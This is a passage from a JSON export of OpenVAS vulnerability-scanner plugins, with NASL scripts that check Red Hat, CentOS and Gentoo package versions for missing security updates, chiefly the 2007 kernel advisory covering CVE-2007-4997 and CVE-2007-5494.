http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-apps/sitebar\", unaffected: make_list(\"ge 3.3.9\"), vulnerable: make_list(\"lt 3.3.9\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:43", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870177", "id": "OPENVAS:870177", "title": "RedHat Update for kernel RHSA-2007:1104-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2007:1104-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. 
This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2007-December/msg00018.html\");\n script_id(870177);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2007:1104-01\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"RedHat Update for kernel RHSA-2007:1104-01\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == 
\"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:03", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880327", "id": "OPENVAS:880327", "title": "CentOS Update for kernel CESA-2007:1104 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2007:1104 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. 
In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. 
This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2007-December/014550.html\");\n script_id(880327);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2007:1104\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"CentOS Update for kernel CESA-2007:1104 centos4 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:10", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880333", "id": "OPENVAS:880333", "title": "CentOS Update for kernel CESA-2007:1104 centos4 x86_64", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# CentOS Update for kernel CESA-2007:1104 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. 
As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2007-December/014549.html\");\n script_id(880333);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2007:1104\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"CentOS Update for kernel CESA-2007:1104 centos4 x86_64\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security 
Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", 
rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:19", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880327", "id": "OPENVAS:1361412562310880327", "title": "CentOS Update for kernel CESA-2007:1104 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2007:1104 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. 
In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. 
This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2007-December/014550.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880327\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2007:1104\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"CentOS Update for kernel CESA-2007:1104 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", 
rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:39", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880333", "id": "OPENVAS:1361412562310880333", "type": "openvas", "title": "CentOS Update for kernel CESA-2007:1104 centos4 x86_64", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2007:1104 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. 
As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2007-December/014549.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880333\");\n script_version(\"$Revision: 9370 $\");\n 